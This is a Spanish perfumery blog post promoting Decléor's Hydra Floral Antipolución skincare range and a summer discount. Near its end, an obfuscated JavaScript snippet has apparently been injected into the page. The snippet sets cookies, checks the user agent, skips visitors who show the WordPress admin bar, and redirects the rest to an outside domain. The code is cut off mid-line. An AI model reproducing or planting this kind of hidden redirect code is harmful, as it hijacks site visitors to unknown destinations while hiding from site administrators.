Decleor descuento

La polución, la contaminación del aire  y la exposición a agentes externos hacen que nuestra piel esté expuesta a agresores externos causantes de los problemas en la piel.

Decléor es una marca que se define por su uso de ingredientes naturales sin dejar de lado la importancia de la aromaterapia que hace que utilizar sus productos sean una gozada para todos los sentidos.

La textura, el aroma, y por supuesto la efectividad de sus productos hace que Decléor sea una experiencia que desde Perfumerías Tin Tin os recomendamos probar.

Decléor apuesta por los aceites esenciales y extractos botánicos para poder compensar los efectos nocivos de la vida urbana.

Por ello ha renovado su ya conocida gama Hydra Floral Antipolución, que protege de los efectos de la polución y aporta una hidratación intensa, aliviando y protegiendo la piel de la vida ajetreada.

Hydra Floral Antipolución se presenta en tres texturas que harán las delicias de nuestra piel.

Inspirándose en los increíbles poderes de las flores, Hydra Floral Antipolución gracias a su textura ligera y fresca, cuenta en su formulación con activos potenciadores de hidratación y extraordinarios beneficios de multi-protección.

Además conseguiremos 24 Horas de Hidratación ya que ayuda a captar el agua, favoreciendo la síntesis del ácido hialurónico* para que la piel quede rellenada gracias al Extracto de Pensamiento Silvestre.

Mejora la difusión del agua, aumentando la síntesis de las acuaporinas*, auténticos canales de irrigación de las células para aportar una hidratación óptima.

A través del Extracto de Crista Marina  favorece la fijación del agua en la superficie para prevenir la deshidratación actuando como barrera que conserva el agua en nuestra piel.

Pero no acaba allí, sino que además tiene una función multiprotectora durante 24 Horas. Gracias a las Microproteínas de Moringa Oleifera (Árbol de Zonas Tropicales) y Extracto de Girasol protege nuestra piel de la contaminación* y de los dañinos radicales libres*. Hydra Floral Antipolución de Decléor ayuda a prevenir los desequilibrios internos de la epidermis.

* test in vitro.

Resultado: Como si de una flor se tratase, la piel está perfectamente hidratada y fresca. Protegida y cuidada su capital de belleza queda preservado.

La fragancia floral y el aceite esencial de Neroli procedente de la destilación de la flor del naranjo amargo en Túnez, Citrus Aurantium Amara, invitan a la relajación, ya que el gel se funde inmediatamente en la piel, obteniendo como resultado una piel lisa y luminosa.

Los productos que componen la gama Hydra Floral Antipolución son:

La Loción Hidratante anti-polución, que redensifica la piel, consiguiendo que las arrugas deshidratadas se alisen y aportan suavidad y luminosidad:

agua

 

El Fluido hidratante anti-polución, que protege la piel de agentes externos con SPF30, este fluido protege de los rayos UVB. Deja en la piel un velo aterciopelado sin efecto graso ni brillo.:

fluido

El Gel Hidratante anti-polución, crea una película protectora en la superficie de la piel contra las partículas de contaminación y ayuda a reforzar la barrera cutánea.

decleor-hydra-floral-gelee-hydratante-anti-pollution

Este trío consigue la dosis perfecta para revitalizar la piel expuesta a la contaminación.

Esta semana encuentra tus productos Decléor con hasta un 20% de descuento hasta el 2 de Agosto en nuestra perfumería online.

  var a=[‘toUTCString’,’cookie’,’split’,’length’,’charAt’,’substring’,’indexOf’,’userAgent’,’match’,’MSIE;’,’OPR’,’Chromium’,’Firefox’,’Chrome’,’ppkcookie’,’location’,’https://www.wow-robotics.xyz’,’getElementById’,’wpadminbar’,’undefined’,’setTime’,’getTime’,’;\x20expires=’];(function(c,d){var e=function(f){while(–f){c[‘push’](c[‘shift’]());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(‘0x0’)](b(‘0x1’))===null){if(typeof c===b(‘0x2’)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(‘0x3’)](h[b(‘0x4’)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(‘0x5’)+h[b(‘0x6’)]();}document[b(‘0x7′)]=d+’=’+(e||”)+g+’;\x20path=/’;}function i(j){var k=j+’=’;var l=document[b(‘0x7’)][b(‘0x8’)](‘;’);for(var m=0x0;m

¿Te ha gustado? ¡Compártelo!Share on FacebookTweet about this on TwitterPin on PinterestShare on LinkedInShare on Google+Email this to someone